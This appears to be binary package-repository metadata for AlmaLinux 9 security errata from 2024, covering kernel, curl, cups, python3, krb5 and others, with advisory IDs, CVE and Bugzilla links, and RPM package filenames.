��UBsecurityImportant: libndp security update,'��a�[https://access.redhat.com/errata/RHSA-2024:4636RHSA-2024:4636RHSA-2024:4636https://access.redhat.com/security/cve/CVE-2024-5564CVE-2024-5564CVE-2024-5564https://bugzilla.redhat.com/22841222284122https://errata.almalinux.org/9/ALSA-2024-4636.htmlALSA-2024:4636ALSA-2024:4636�9�klibndp-1.8-6.el9_4.alma.1.i686.rpm�9�klibndp-1.8-6.el9_4.alma.1.x86_64.rpm�9�klibndp-1.8-6.el9_4.alma.1.i686.rpm�9�klibndp-1.8-6.el9_4.alma.1.x86_64.rpm����]
�*�YBBBBBBBBBBBBBBBsecurityModerate: linux-firmware security update,��<�#https://access.redhat.com/errata/RHSA-2024:4774RHSA-2024:4774RHSA-2024:4774https://access.redhat.com/security/cve/CVE-2023-31346CVE-2023-31346CVE-2023-31346https://bugzilla.redhat.com/22504582250458https://errata.almalinux.org/9/ALSA-2024-4774.htmlALSA-2024:4774ALSA-2024:4774�d�biwl2030-firmware-18.168.6.1-143.1.el9_4.noarch.rpm�j�iwl6050-firmware-41.28.5.1-143.1.el9_4.noarch.rpm�e�Miwl3160-firmware-25.30.13.0-143.1.el9_4.noarch.rpm�i�biwl6000g2b-firmware-18.168.6.1-143.1.el9_4.noarch.rpm�g�iwl5150-firmware-8.24.2.2-143.1.el9_4.noarch.rpm�o�]netronome-firmware-20240603-143.1.el9_4.noarch.rpm�_�iwl100-firmware-39.31.5.1-143.1.el9_4.noarch.rpm�b�biwl135-firmware-18.168.6.1-143.1.el9_4.noarch.rpm�a�biwl105-firmware-18.168.6.1-143.1.el9_4.noarch.rpm�l�]libertas-sd8787-firmware-20240603-143.1.el9_4.noarch.rpm�`�iwl1000-firmware-39.31.5.1-143.1.el9_4.noarch.rpm�m�]linux-firmware-20240603-143.1.el9_4.noarch.rpm�h�biwl6000g2a-firmware-18.168.6.1-143.1.el9_4.noarch.rpm�f�#iwl5000-firmware-8.83.5.1_1-143.1.el9_4.noarch.rpm�k�Miwl7260-firmware-25.30.13.0-143.1.el9_4.noarch.rpm�n�]linux-firmware-whence-20240603-143.1.el9_4.noarch.rpm�c�biwl2000-firmware-18.168.6.1-143.1.el9_4.noarch.rpm�d�biwl2030-firmware-18.168.6.1-143.1.el9_4.noarch.rpm�j�iwl6050-firmware-41.28.5.1-143.1.el9_4.noarch.rpm�e�Miwl3160-firmware-25.30.13.0-143.1.el9_4.noarch.rpm�i�biwl6000g2b-firmware-18.168.6.1-143.1.el9_4.noarch.rpm�g�iwl5150-firmware-8.24.2.2-143.1.el9_4.noarch.rpm�o�]netronome-firmware-20240603-143.1.el9_4.noarch.rpm�_�iwl100-firmware-39.31.5.1-143.1.el9_4.noarch.rpm�b�biwl135-firmware-18.168.6.1-143.1.el9_4.noarch.rpm�a�biwl105-firmware-18.168.6.1-143.1.el9_4.noarch.rpm�l�]libertas-sd8787-firmware-20240603-143.1.el9_4.noarch.rpm�`�iwl1000-firmware-39.31.5.1-143.1.el9_4.noarch.rpm�m�]linux-firmware-20240603-143.1.el9_4.noarch.rpm�h�biwl6000g2a-firmware-18.168.6.1-143.1.el9_4.noarch.rpm�f�#iwl5000-firmware-8.83.5.1_1-143.1.el9_4.noarch.rpm�k�Miwl7260-firmware-25.30.13.0-143.1.el9_4.noarch.rpm�n�]linux-firmware-whence-20240603-143.1.el9_4.noarch.rpm�c�biwl2000-firmware-18.168.6.1-143.1.el9_4.noarch.rpm����a�^
�)�kBsecurityModerate: cups security update,��_�
https://access.redhat.com/errata/RHSA-2024:4776RHSA-2024:4776RHSA-2024:4776https://access.redhat.com/security/cve/CVE-2024-35235CVE-2024-35235CVE-2024-35235https://bugzilla.redhat.com/22903182290318https://errata.almalinux.org/9/ALSA-2024-4776.htmlALSA-2024:4776ALSA-2024:4776�+�ncups-libs-2.3.3op2-27.el9_4.i686.rpm�+�ncups-libs-2.3.3op2-27.el9_4.x86_64.rpm�+�ncups-libs-2.3.3op2-27.el9_4.i686.rpm�+�ncups-libs-2.3.3op2-27.el9_4.x86_64.rpm����Z�_
�*�nBBBsecurityLow: python3 security update,�9��i�,https://access.redhat.com/errata/RHSA-2024:4779RHSA-2024:4779RHSA-2024:4779https://access.redhat.com/security/cve/CVE-2024-4032CVE-2024-4032CVE-2024-4032https://bugzilla.redhat.com/22929212292921https://errata.almalinux.org/9/ALSA-2024-4779.htmlALSA-2024:4779ALSA-2024:4779��python3-3.9.18-3.el9_4.3.x86_64.rpm-�python3-libs-3.9.18-3.el9_4.3.x86_64.rpm-�python3-libs-3.9.18-3.el9_4.3.i686.rpm��python3-3.9.18-3.el9_4.3.x86_64.rpm-�python3-libs-3.9.18-3.el9_4.3.x86_64.rpm-�python3-libs-3.9.18-3.el9_4.3.i686.rpm����^�`
�+�sBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update,���1$https://access.redhat.com/errata/RHSA-2024:4928RHSA-2024:4928RHSA-2024:4928https://access.redhat.com/security/cve/CVE-2021-47459CVE-2021-47459CVE-2021-47459https://access.redhat.com/security/cve/CVE-2022-48743CVE-2022-48743CVE-2022-48743https://access.redhat.com/security/cve/CVE-2023-52458CVE-2023-52458CVE-2023-52458https://access.redhat.com/security/cve/CVE-2023-52809CVE-2023-52809CVE-2023-52809https://access.redhat.com/security/cve/CVE-2024-26737CVE-2024-26737CVE-2024-26737https://access.redhat.com/security/cve/CVE-2024-26773CVE-2024-26773CVE-2024-26773https://access.redhat.com/security/cve/CVE-2024-26852CVE-2024-26852CVE-2024-26852https://access.redhat.com/security/cve/CVE-2024-26880CVE-2024-26880CVE-2024-26880https://access.redhat.com/security/cve/CVE-2024-26982CVE-2024-26982CVE-2024-26982https://access.redhat.com/security/cve/CVE-2024-27030CVE-2024-27030CVE-2024-27030https://access.redhat.com/security/cve/CVE-2024-27046CVE-2024-27046CVE-2024-27046https://access.redhat.com/security/cve/CVE-2024-35857CVE-2024-35857CVE-2024-35857https://access.redhat.com/security/cve/CVE-2024-35885CVE-2024-35885CVE-2024-35885https://access.redhat.com/security/cve/CVE-2024-35907CVE-2024-35907CVE-2024-35907https://access.redhat.com/security/cve/CVE-2024-36924CVE-2024-36924CVE-2024-36924https://access.redhat.com/security/cve/CVE-2024-36952CVE-2024-36952CVE-2024-36952https://access.redhat.com/security/cve/CVE-2024-38580CVE-2024-38580CVE-2024-38580https://bugzilla.redhat.com/22657942265794https://bugzilla.redhat.com/22732362273236https://bugzilla.redhat.com/22732742273274https://bugzilla.redhat.com/22756902275690https://bugzilla.redhat.com/22757612275761https://bugzilla.redhat.com/22783372278337https://bugzilla.redhat.com/22784352278435https://bugzilla.redhat.com/22784732278473https://bugzilla.redhat.com/22812472281247https://bugzilla.redhat.com/22816472281647https://bugzilla.redhat.com/22817002281700https://bugzilla.redhat.com/22826692282669https://bugzilla.redhat.com/22828982282898https://bugzilla.redhat.com/22845062284506https://bugzilla.redhat.com/22845982284598https://bugzilla.redhat.com/22933162293316https://bugzilla.redhat.com/22934122293412https://errata.almalinux.org/9/ALSA-2024-4928.htmlALSA-2024:4928ALSA-2024:4928Ikernel-modules-extra-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-debug-core-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-modules-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-debug-modules-extra-5.14.0-427.28.1.el9_4.x86_64.rpm2Ipython3-perf-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-debug-modules-core-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-tools-libs-5.14.0-427.28.1.el9_4.x86_64.rpm"Ikernel-uki-virt-5.14.0-427.28.1.el9_4.x86_64.rpm!Ikernel-modules-core-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-debug-modules-5.14.0-427.28.1.el9_4.x86_64.rpm Ikernel-debug-uki-virt-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-core-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-debug-5.14.0-427.28.1.el9_4.x86_64.rpm1�Cbpftool-7.3.0-427.28.1.el9_4.x86_64.rpmIkernel-abi-stablelists-5.14.0-427.28.1.el9_4.noarch.rpmIkernel-tools-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-modules-extra-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-debug-core-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-modules-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-debug-modules-extra-5.14.0-427.28.1.el9_4.x86_64.rpm2Ipython3-perf-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-debug-modules-core-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-tools-libs-5.14.0-427.28.1.el9_4.x86_64.rpm"Ikernel-uki-virt-5.14.0-427.28.1.el9_4.x86_64.rpm!Ikernel-modules-core-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-debug-modules-5.14.0-427.28.1.el9_4.x86_64.rpm Ikernel-debug-uki-virt-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-core-5.14.0-427.28.1.el9_4.x86_64.rpmIkernel-debug-5.14.0-427.28.1.el9_4.x86_64.rpm1�Cbpftool-7.3.0-427.28.1.el9_4.x86_64.rpmIkernel-abi-stablelists-5.14.0-427.28.1.el9_4.noarch.rpmIkernel-tools-5.14.0-427.28.1.el9_4.x86_64.rpm����Q�a
�,�TBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update,'��F�4^https://access.redhat.com/errata/RHSA-2024:5363RHSA-2024:5363RHSA-2024:5363https://access.redhat.com/security/cve/CVE-2021-47606CVE-2021-47606CVE-2021-47606https://access.redhat.com/security/cve/CVE-2023-52651CVE-2023-52651CVE-2023-52651https://access.redhat.com/security/cve/CVE-2023-52864CVE-2023-52864CVE-2023-52864https://access.redhat.com/security/cve/CVE-2024-21823CVE-2024-21823CVE-2024-21823https://access.redhat.com/security/cve/CVE-2024-26600CVE-2024-26600CVE-2024-26600https://access.redhat.com/security/cve/CVE-2024-26808CVE-2024-26808CVE-2024-26808https://access.redhat.com/security/cve/CVE-2024-26828CVE-2024-26828CVE-2024-26828https://access.redhat.com/security/cve/CVE-2024-26853CVE-2024-26853CVE-2024-26853https://access.redhat.com/security/cve/CVE-2024-26868CVE-2024-26868CVE-2024-26868https://access.redhat.com/security/cve/CVE-2024-26897CVE-2024-26897CVE-2024-26897https://access.redhat.com/security/cve/CVE-2024-27049CVE-2024-27049CVE-2024-27049https://access.redhat.com/security/cve/CVE-2024-27052CVE-2024-27052CVE-2024-27052https://access.redhat.com/security/cve/CVE-2024-27065CVE-2024-27065CVE-2024-27065https://access.redhat.com/security/cve/CVE-2024-27417CVE-2024-27417CVE-2024-27417https://access.redhat.com/security/cve/CVE-2024-27434CVE-2024-27434CVE-2024-27434https://access.redhat.com/security/cve/CVE-2024-33621CVE-2024-33621CVE-2024-33621https://access.redhat.com/security/cve/CVE-2024-35789CVE-2024-35789CVE-2024-35789https://access.redhat.com/security/cve/CVE-2024-35800CVE-2024-35800CVE-2024-35800https://access.redhat.com/security/cve/CVE-2024-35823CVE-2024-35823CVE-2024-35823https://access.redhat.com/security/cve/CVE-2024-35845CVE-2024-35845CVE-2024-35845https://access.redhat.com/security/cve/CVE-2024-35848CVE-2024-35848CVE-2024-35848https://access.redhat.com/security/cve/CVE-2024-35852CVE-2024-35852CVE-2024-35852https://access.redhat.com/security/cve/CVE-2024-35899CVE-2024-35899CVE-2024-35899https://access.redhat.com/security/cve/CVE-2024-35911CVE-2024-35911CVE-2024-35911https://access.redhat.com/security/cve/CVE-2024-35937CVE-2024-35937CVE-2024-35937https://access.redhat.com/security/cve/CVE-2024-35969CVE-2024-35969CVE-2024-35969https://access.redhat.com/security/cve/CVE-2024-36005CVE-2024-36005CVE-2024-36005https://access.redhat.com/security/cve/CVE-2024-36017CVE-2024-36017CVE-2024-36017https://access.redhat.com/security/cve/CVE-2024-36020CVE-2024-36020CVE-2024-36020https://access.redhat.com/security/cve/CVE-2024-36489CVE-2024-36489CVE-2024-36489https://access.redhat.com/security/cve/CVE-2024-36903CVE-2024-36903CVE-2024-36903https://access.redhat.com/security/cve/CVE-2024-36921CVE-2024-36921CVE-2024-36921https://access.redhat.com/security/cve/CVE-2024-36922CVE-2024-36922CVE-2024-36922https://access.redhat.com/security/cve/CVE-2024-36929CVE-2024-36929CVE-2024-36929https://access.redhat.com/security/cve/CVE-2024-36941CVE-2024-36941CVE-2024-36941https://access.redhat.com/security/cve/CVE-2024-36971CVE-2024-36971CVE-2024-36971https://access.redhat.com/security/cve/CVE-2024-37353CVE-2024-37353CVE-2024-37353https://access.redhat.com/security/cve/CVE-2024-37356CVE-2024-37356CVE-2024-37356https://access.redhat.com/security/cve/CVE-2024-38391CVE-2024-38391CVE-2024-38391https://access.redhat.com/security/cve/CVE-2024-38558CVE-2024-38558CVE-2024-38558https://access.redhat.com/security/cve/CVE-2024-38575CVE-2024-38575CVE-2024-38575https://access.redhat.com/security/cve/CVE-2024-39487CVE-2024-39487CVE-2024-39487https://access.redhat.com/security/cve/CVE-2024-40928CVE-2024-40928CVE-2024-40928https://access.redhat.com/security/cve/CVE-2024-40954CVE-2024-40954CVE-2024-40954https://access.redhat.com/security/cve/CVE-2024-40958CVE-2024-40958CVE-2024-40958https://access.redhat.com/security/cve/CVE-2024-40961CVE-2024-40961CVE-2024-40961https://bugzilla.redhat.com/22658382265838https://bugzilla.redhat.com/22734052273405https://bugzilla.redhat.com/22756002275600https://bugzilla.redhat.com/22756552275655https://bugzilla.redhat.com/22757152275715https://bugzilla.redhat.com/22757482275748https://bugzilla.redhat.com/22783802278380https://bugzilla.redhat.com/22784172278417https://bugzilla.redhat.com/22784292278429https://bugzilla.redhat.com/22785192278519https://bugzilla.redhat.com/22789892278989https://bugzilla.redhat.com/22810572281057https://bugzilla.redhat.com/22810972281097https://bugzilla.redhat.com/22811332281133https://bugzilla.redhat.com/22811902281190https://bugzilla.redhat.com/22812372281237https://bugzilla.redhat.com/22812572281257https://bugzilla.redhat.com/22812652281265https://bugzilla.redhat.com/22812722281272https://bugzilla.redhat.com/22816392281639https://bugzilla.redhat.com/22816672281667https://bugzilla.redhat.com/22818212281821https://bugzilla.redhat.com/22819002281900https://bugzilla.redhat.com/22819492281949https://bugzilla.redhat.com/22827192282719https://bugzilla.redhat.com/22844002284400https://bugzilla.redhat.com/22844172284417https://bugzilla.redhat.com/22844742284474https://bugzilla.redhat.com/22844962284496https://bugzilla.redhat.com/22845112284511https://bugzilla.redhat.com/22845132284513https://bugzilla.redhat.com/22845432284543https://bugzilla.redhat.com/22923312292331https://bugzilla.redhat.com/22932082293208https://bugzilla.redhat.com/22934182293418https://bugzilla.redhat.com/22934412293441https://bugzilla.redhat.com/22936572293657https://bugzilla.redhat.com/22936582293658https://bugzilla.redhat.com/22936862293686https://bugzilla.redhat.com/22936872293687https://bugzilla.redhat.com/22936882293688https://bugzilla.redhat.com/22970562297056https://bugzilla.redhat.com/22975122297512https://bugzilla.redhat.com/22975382297538https://bugzilla.redhat.com/22975422297542https://bugzilla.redhat.com/22975452297545https://errata.almalinux.org/9/ALSA-2024-5363.htmlALSA-2024:5363ALSA-2024:5363Jkernel-debug-modules-core-5.14.0-427.31.1.el9_4.x86_64.rpm1�Dbpftool-7.3.0-427.31.1.el9_4.x86_64.rpm2Jpython3-perf-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-core-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-5.14.0-427.31.1.el9_4.x86_64.rpm Jkernel-debug-uki-virt-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-debug-modules-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-tools-libs-5.14.0-427.31.1.el9_4.x86_64.rpm!Jkernel-modules-core-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-modules-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-debug-modules-extra-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-debug-core-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-abi-stablelists-5.14.0-427.31.1.el9_4.noarch.rpmJkernel-debug-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-tools-5.14.0-427.31.1.el9_4.x86_64.rpm"Jkernel-uki-virt-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-modules-extra-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-debug-modules-core-5.14.0-427.31.1.el9_4.x86_64.rpm1�Dbpftool-7.3.0-427.31.1.el9_4.x86_64.rpm2Jpython3-perf-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-core-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-5.14.0-427.31.1.el9_4.x86_64.rpm Jkernel-debug-uki-virt-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-debug-modules-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-tools-libs-5.14.0-427.31.1.el9_4.x86_64.rpm!Jkernel-modules-core-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-modules-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-debug-modules-extra-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-debug-core-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-abi-stablelists-5.14.0-427.31.1.el9_4.noarch.rpmJkernel-debug-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-tools-5.14.0-427.31.1.el9_4.x86_64.rpm"Jkernel-uki-virt-5.14.0-427.31.1.el9_4.x86_64.rpmJkernel-modules-extra-5.14.0-427.31.1.el9_4.x86_64.rpm����|�b
�-�uBBBBBBBBsecurityModerate: curl security update,��z�(https://access.redhat.com/errata/RHSA-2024:5529RHSA-2024:5529RHSA-2024:5529https://access.redhat.com/security/cve/CVE-2024-2398CVE-2024-2398CVE-2024-2398https://bugzilla.redhat.com/22704982270498https://errata.almalinux.org/9/ALSA-2024-5529.htmlALSA-2024:5529ALSA-2024:5529|�Mlibcurl-minimal-7.76.1-29.el9_4.1.i686.rpm{�Mlibcurl-7.76.1-29.el9_4.1.i686.rpm|�Mlibcurl-minimal-7.76.1-29.el9_4.1.x86_64.rpm�*�Mcurl-minimal-7.76.1-29.el9_4.1.x86_64.rpm�)�Mcurl-7.76.1-29.el9_4.1.x86_64.rpm{�Mlibcurl-7.76.1-29.el9_4.1.x86_64.rpm|�Mlibcurl-minimal-7.76.1-29.el9_4.1.i686.rpm{�Mlibcurl-7.76.1-29.el9_4.1.i686.rpm|�Mlibcurl-minimal-7.76.1-29.el9_4.1.x86_64.rpm�*�Mcurl-minimal-7.76.1-29.el9_4.1.x86_64.rpm�)�Mcurl-7.76.1-29.el9_4.1.x86_64.rpm{�Mlibcurl-7.76.1-29.el9_4.1.x86_64.rpm����/�c
��securityImportant: python-setuptools security update,'��"�xhttps://access.redhat.com/errata/RHSA-2024:5534RHSA-2024:5534RHSA-2024:5534https://access.redhat.com/security/cve/CVE-2024-6345CVE-2024-6345CVE-2024-6345https://bugzilla.redhat.com/22977712297771https://errata.almalinux.org/9/ALSA-2024-5534.htmlALSA-2024:5534ALSA-2024:5534�J�Qpython3-setuptools-53.0.0-12.el9_4.1.noarch.rpm�K�Qpython3-setuptools-wheel-53.0.0-12.el9_4.1.noarch.rpm�J�Qpython3-setuptools-53.0.0-12.el9_4.1.noarch.rpm�K�Qpython3-setuptools-wheel-53.0.0-12.el9_4.1.noarch.rpm����l�d
�.�BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update,'���Thttps://access.redhat.com/errata/RHSA-2024:5928RHSA-2024:5928RHSA-2024:5928https://access.redhat.com/security/cve/CVE-2023-52771CVE-2023-52771CVE-2023-52771https://access.redhat.com/security/cve/CVE-2023-52880CVE-2023-52880CVE-2023-52880https://access.redhat.com/security/cve/CVE-2024-26581CVE-2024-26581CVE-2024-26581https://access.redhat.com/security/cve/CVE-2024-26668CVE-2024-26668CVE-2024-26668https://access.redhat.com/security/cve/CVE-2024-26810CVE-2024-26810CVE-2024-26810https://access.redhat.com/security/cve/CVE-2024-26855CVE-2024-26855CVE-2024-26855https://access.redhat.com/security/cve/CVE-2024-26908CVE-2024-26908CVE-2024-26908https://access.redhat.com/security/cve/CVE-2024-26925CVE-2024-26925CVE-2024-26925https://access.redhat.com/security/cve/CVE-2024-27016CVE-2024-27016CVE-2024-27016https://access.redhat.com/security/cve/CVE-2024-27019CVE-2024-27019CVE-2024-27019https://access.redhat.com/security/cve/CVE-2024-27020CVE-2024-27020CVE-2024-27020https://access.redhat.com/security/cve/CVE-2024-27415CVE-2024-27415CVE-2024-27415https://access.redhat.com/security/cve/CVE-2024-35839CVE-2024-35839CVE-2024-35839https://access.redhat.com/security/cve/CVE-2024-35896CVE-2024-35896CVE-2024-35896https://access.redhat.com/security/cve/CVE-2024-35897CVE-2024-35897CVE-2024-35897https://access.redhat.com/security/cve/CVE-2024-35898CVE-2024-35898CVE-2024-35898https://access.redhat.com/security/cve/CVE-2024-35962CVE-2024-35962CVE-2024-35962https://access.redhat.com/security/cve/CVE-2024-36003CVE-2024-36003CVE-2024-36003https://access.redhat.com/security/cve/CVE-2024-36025CVE-2024-36025CVE-2024-36025https://access.redhat.com/security/cve/CVE-2024-38538CVE-2024-38538CVE-2024-38538https://access.redhat.com/security/cve/CVE-2024-38540CVE-2024-38540CVE-2024-38540https://access.redhat.com/security/cve/CVE-2024-38544CVE-2024-38544CVE-2024-38544https://access.redhat.com/security/cve/CVE-2024-38579CVE-2024-38579CVE-2024-38579https://access.redhat.com/security/cve/CVE-2024-38608CVE-2024-38608CVE-2024-38608https://access.redhat.com/security/cve/CVE-2024-39476CVE-2024-39476CVE-2024-39476https://access.redhat.com/security/cve/CVE-2024-40905CVE-2024-40905CVE-2024-40905https://access.redhat.com/security/cve/CVE-2024-40911CVE-2024-40911CVE-2024-40911https://access.redhat.com/security/cve/CVE-2024-40912CVE-2024-40912CVE-2024-40912https://access.redhat.com/security/cve/CVE-2024-40914CVE-2024-40914CVE-2024-40914https://access.redhat.com/security/cve/CVE-2024-40929CVE-2024-40929CVE-2024-40929https://access.redhat.com/security/cve/CVE-2024-40939CVE-2024-40939CVE-2024-40939https://access.redhat.com/security/cve/CVE-2024-40941CVE-2024-40941CVE-2024-40941https://access.redhat.com/security/cve/CVE-2024-40957CVE-2024-40957CVE-2024-40957https://access.redhat.com/security/cve/CVE-2024-40978CVE-2024-40978CVE-2024-40978https://access.redhat.com/security/cve/CVE-2024-40983CVE-2024-40983CVE-2024-40983https://access.redhat.com/security/cve/CVE-2024-41041CVE-2024-41041CVE-2024-41041https://access.redhat.com/security/cve/CVE-2024-41076CVE-2024-41076CVE-2024-41076https://access.redhat.com/security/cve/CVE-2024-41090CVE-2024-41090CVE-2024-41090https://access.redhat.com/security/cve/CVE-2024-41091CVE-2024-41091CVE-2024-41091https://access.redhat.com/security/cve/CVE-2024-42110CVE-2024-42110CVE-2024-42110https://access.redhat.com/security/cve/CVE-2024-42152CVE-2024-42152CVE-2024-42152https://bugzilla.redhat.com/22651852265185https://bugzilla.redhat.com/22727972272797https://bugzilla.redhat.com/22736542273654https://bugzilla.redhat.com/22757422275742https://bugzilla.redhat.com/22757442275744https://bugzilla.redhat.com/22771662277166https://bugzilla.redhat.com/22782562278256https://bugzilla.redhat.com/22782582278258https://bugzilla.redhat.com/22782642278264https://bugzilla.redhat.com/22811012281101https://bugzilla.redhat.com/22812842281284https://bugzilla.redhat.com/22816692281669https://bugzilla.redhat.com/22816722281672https://bugzilla.redhat.com/22816752281675https://bugzilla.redhat.com/22819162281916https://bugzilla.redhat.com/22819582281958https://bugzilla.redhat.com/22827202282720https://bugzilla.redhat.com/22834682283468https://bugzilla.redhat.com/22844212284421https://bugzilla.redhat.com/22933562293356https://bugzilla.redhat.com/22934142293414https://bugzilla.redhat.com/22934552293455https://bugzilla.redhat.com/22934592293459https://bugzilla.redhat.com/22934612293461https://bugzilla.redhat.com/22959142295914https://bugzilla.redhat.com/22974892297489https://bugzilla.redhat.com/22974952297495https://bugzilla.redhat.com/22974962297496https://bugzilla.redhat.com/22974982297498https://bugzilla.redhat.com/22975132297513https://bugzilla.redhat.com/22975232297523https://bugzilla.redhat.com/22975252297525https://bugzilla.redhat.com/22975412297541https://bugzilla.redhat.com/22975622297562https://bugzilla.redhat.com/22975672297567https://bugzilla.redhat.com/22992402299240https://bugzilla.redhat.com/22993362299336https://bugzilla.redhat.com/23004102300410https://bugzilla.redhat.com/23004532300453https://bugzilla.redhat.com/23014732301473https://bugzilla.redhat.com/23015192301519https://errata.almalinux.org/9/ALSA-2024-5928.htmlALSA-2024:5928ALSA-2024:5928Kkernel-debug-core-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-modules-extra-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-debug-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-abi-stablelists-5.14.0-427.33.1.el9_4.noarch.rpmKkernel-debug-modules-core-5.14.0-427.33.1.el9_4.x86_64.rpm2Kpython3-perf-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-debug-modules-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-5.14.0-427.33.1.el9_4.x86_64.rpm Kkernel-debug-uki-virt-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-core-5.14.0-427.33.1.el9_4.x86_64.rpm"Kkernel-uki-virt-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-modules-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-tools-libs-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-debug-modules-extra-5.14.0-427.33.1.el9_4.x86_64.rpm!Kkernel-modules-core-5.14.0-427.33.1.el9_4.x86_64.rpm1�Ebpftool-7.3.0-427.33.1.el9_4.x86_64.rpmKkernel-tools-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-debug-core-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-modules-extra-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-debug-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-abi-stablelists-5.14.0-427.33.1.el9_4.noarch.rpmKkernel-debug-modules-core-5.14.0-427.33.1.el9_4.x86_64.rpm2Kpython3-perf-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-debug-modules-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-5.14.0-427.33.1.el9_4.x86_64.rpm Kkernel-debug-uki-virt-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-core-5.14.0-427.33.1.el9_4.x86_64.rpm"Kkernel-uki-virt-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-modules-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-tools-libs-5.14.0-427.33.1.el9_4.x86_64.rpmKkernel-debug-modules-extra-5.14.0-427.33.1.el9_4.x86_64.rpm!Kkernel-modules-core-5.14.0-427.33.1.el9_4.x86_64.rpm1�Ebpftool-7.3.0-427.33.1.el9_4.x86_64.rpmKkernel-tools-5.14.0-427.33.1.el9_4.x86_64.rpm����*�e
�$�#securityModerate: python-urllib3 security update,��2�+https://access.redhat.com/errata/RHSA-2024:6162RHSA-2024:6162RHSA-2024:6162https://access.redhat.com/security/cve/CVE-2024-37891CVE-2024-37891CVE-2024-37891https://bugzilla.redhat.com/22927882292788https://errata.almalinux.org/9/ALSA-2024-6162.htmlALSA-2024:6162ALSA-2024:6162�L�python3-urllib3-1.26.5-5.el9_4.1.noarch.rpm�L�python3-urllib3-1.26.5-5.el9_4.1.noarch.rpm��ܝ7�f
�/�eBBBsecurityModerate: python3.9 security update,��]�hhttps://access.redhat.com/errata/RHSA-2024:6163RHSA-2024:6163RHSA-2024:6163https://access.redhat.com/security/cve/CVE-2024-6923CVE-2024-6923CVE-2024-6923https://bugzilla.redhat.com/23022552302255https://errata.almalinux.org/9/ALSA-2024-6163.htmlALSA-2024:6163ALSA-2024:6163-�python3-libs-3.9.18-3.el9_4.5.i686.rpm��python3-3.9.18-3.el9_4.5.x86_64.rpm-�python3-libs-3.9.18-3.el9_4.5.x86_64.rpm-�python3-libs-3.9.18-3.el9_4.5.i686.rpm��python3-3.9.18-3.el9_4.5.x86_64.rpm-�python3-libs-3.9.18-3.el9_4.5.x86_64.rpm����g
�0�jBBBBBBBBBBBBBBBsecurityModerate: krb5 security update,��E�https://access.redhat.com/errata/RHSA-2024:6166RHSA-2024:6166RHSA-2024:6166https://access.redhat.com/security/cve/CVE-2024-37370CVE-2024-37370CVE-2024-37370https://access.redhat.com/security/cve/CVE-2024-37371CVE-2024-37371CVE-2024-37371https://bugzilla.redhat.com/22946762294676https://bugzilla.redhat.com/22946772294677https://errata.almalinux.org/9/ALSA-2024-6166.htmlALSA-2024:6166ALSA-2024:6166�$�krb5-libs-1.21.1-2.el9_4.i686.rpm�p�krb5-workstation-1.21.1-2.el9_4.x86_64.rpm�&�krb5-server-1.21.1-2.el9_4.x86_64.rpm�(�libkadm5-1.21.1-2.el9_4.i686.rpm�&�krb5-server-1.21.1-2.el9_4.i686.rpm�$�krb5-libs-1.21.1-2.el9_4.x86_64.rpm�'�krb5-server-ldap-1.21.1-2.el9_4.x86_64.rpm�%�krb5-pkinit-1.21.1-2.el9_4.i686.rpm�(�libkadm5-1.21.1-2.el9_4.x86_64.rpm�%�krb5-pkinit-1.21.1-2.el9_4.x86_64.rpm�'�krb5-server-ldap-1.21.1-2.el9_4.i686.rpm�$�